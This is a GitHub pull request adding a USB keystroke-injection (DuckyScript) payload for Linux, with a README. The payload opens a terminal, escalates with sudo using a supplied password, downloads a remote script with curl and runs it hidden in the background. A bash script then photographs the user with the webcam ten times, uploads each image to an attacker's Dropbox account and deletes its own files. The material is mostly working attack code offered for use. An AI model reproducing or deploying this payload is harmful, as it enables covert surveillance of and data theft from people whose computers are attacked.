Merge pull request #291 from aleff-github/patch-31

Exfiltrate Photos Through Shell
pull/361/merge
Darren Kitchen 2023-06-09 18:54:27 -05:00 committed by GitHub
commit 65408bdec0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 153 additions and 0 deletions

View File

@ -0,0 +1,56 @@
# Exfiltrate Photos Through Shell - Linux ✅
A script used to exfiltrate photos using fswebcam shell command.
**Category**: Exfiltration
## Description
A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded.
## Getting Started
### Dependencies
* An internet connection
* Linux system
* Dropbox Token, or whatever you want, for the exfiltration
* sudo permission
* 'fswebcam' installed but you can install it with the payload
### Executing program
* Plug in your device
### Settings
* Dropbox Token - You should change it into the script.sh file, line 7.
```Python
TOKEN=your_dropbox_token
```
* This section of sudo time depends by the computer power on which it runs. So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is (so 5000) set now or smaller depending on your needs.
```DuckyScript
STRING SUDO-PSWD
ENTER
REM DELAY Based On Computer Power
DELAY 5000
```
* If you want to install the fswebcam dependency, you should uncomment it. This DELAY (so 5000), like the previous one, is dynamic and in this case relies on the power of the Internet.
```DuckyScript
REM STRING apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power
REM DELAY 5000
```
* Generally does not need much time
```DuckyScript
REM DELAY Based On Internet Power
DELAY 4000
```

View File

@ -0,0 +1,65 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)
REM - sudo permissions
REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Permission ####
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
STRING sudo su
ENTER
DELAY 500
STRING SUDO-PSWD
ENTER
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
REM STRING apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power
REM DELAY 5000
REM #### Script ####
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
REM DELAY Based On Internet Power
DELAY 4000
STRING chmod +x script.sh
ENTER
DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit
ENTER

View File

@ -0,0 +1,32 @@
#!/bin/bash
USER=$(whoami)
DIR=/home/$USER/tmp
TOKEN=your_dropbox_token
mkdir -p $DIR
function remove_folder {
rm -rf "$DIR"
rm -rf "/home/$USER/script.sh"
}
trap remove_folder EXIT
# execute the for, for some times..
for i in {1..10}
do
NAME=$(date +%s%N).jpg
fswebcam --no-banner $DIR/$NAME
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary @$DIR/$NAME
sleep 60
done